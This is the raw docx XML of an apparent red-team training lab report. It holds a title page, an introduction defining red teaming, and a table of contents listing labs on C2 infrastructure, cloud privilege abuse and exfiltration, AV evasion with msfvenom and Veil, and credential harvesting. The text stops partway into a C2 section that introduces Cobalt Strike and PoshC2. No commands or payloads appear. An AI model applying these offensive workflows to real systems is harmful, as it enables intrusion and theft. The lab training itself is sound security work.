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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Name - Windows11 VM and THM lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Title - Red Team Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Date - 27/04/2026</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</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Red teaming is an authorized, adversarial simulation where ethical hackers emulate real-world threat actors to test an organization’s detection and response capabilities across people, processes, and technology. Unlike limited penetration tests, red teaming is comprehensive, long-term, and objective-based, aiming to identify security gaps and improve defensive (blue team) resilience.</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jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="1075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
        <w:gridCol w:w="7320"/>
        <w:gridCol w:w="2415"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1020"/>
            <w:gridCol w:w="7320"/>
            <w:gridCol w:w="24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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">S.No.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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Name of the 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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Page No</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>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center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Setting up C2 Infrastructure</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools Used</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Setting up and managing C2 infrastructure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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cloud Attack Lab</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools Used</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumerating S3 bucket using awscli</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalating Privileges and Exfiltration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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>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center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Adversary Emulation Lab</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools Used</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Simulating APT29 phishing and persistence with caldera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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4 - 5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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>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center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Advanced Evasion Lab</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools Used</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Encode a Metasploit payload with msfvenom to bypass AV</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:color w:val="151c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Network Listener (Veil) and Network Evasion (proxychains)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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5 - 6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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>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center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cloud Privilege Abuse Simulation</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools Used</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Auditing environment and Privilege abusing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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>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center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Automated attack Orchestration</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools Used</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Multi-Phased attack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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">7 - 8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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>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center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Living-Off-the-Land Lab</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools Used</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Executing attacks and harvesting credentials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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">8 - 9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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center"/>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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Executive Summary</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Non-Technical 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jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">9 - 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:line="120" w:lineRule="auto"/>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8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:line="120" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:line="72" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting up C2 Infrastructure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting up Command and Control (C2) infrastructure is a major milestone in penetration testing. It’s where you move from “finding a way in” to “managing your access”. Cobalt strike is the industry standard for this, so getting comfortable with its HTTPS beacons is a great skill to have.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cobalt Strike - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s a commercial, full-featured, remote access tool adversary simulation software designed for penetration testing and red team operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PoshC2 - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is a proxy aware C2 framework used to aid penetration testers with red teaming.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
